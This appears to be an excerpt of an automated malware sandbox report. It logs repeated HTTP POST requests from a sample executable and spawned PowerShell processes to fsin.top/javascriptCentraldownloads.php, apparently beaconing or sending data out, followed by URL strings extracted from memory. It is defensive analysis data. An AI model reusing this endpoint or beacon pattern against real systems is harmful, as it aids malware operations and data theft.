                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: fsin.top | Content-Length: 1284 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: fsin.top | Content-Length: 1272 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: fsin.topContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: fsin.top Content-Length: 1252 Expect: 100-continue Connection: Keep-Alive
                          Source: global traffic HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: fsin.top Content-Length: 1008 Expect: 100-continue
                          Source: global traffic HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: fsin.top Content-Length: 1264 Expect: 100-continue Connection: Keep-Alive
                          Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global traffic DNS traffic detected: DNS query: fsin.top
                          Source: unknown HTTP traffic detected: POST /javascriptCentraldownloads.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: fsin.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                          Source: powershell.exe, 00000019.00000002.3182035697.000001B590075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3076532046.000002D110075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3297623948.0000019591705000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000018.00000002.1940180769.000001F73C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B6078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: UuIspZT5b6.exe, 00000000.00000002.1812160907.000000000343D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1940180769.000001F73C331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B5E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.0000019581691000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000018.00000002.1940180769.000001F73C558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1927051808.000001B580228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1924230223.000002D100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1946781126.000001DA43FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1947599465.00000222B6078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 00000021.00000002.1937100412.00000195818B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
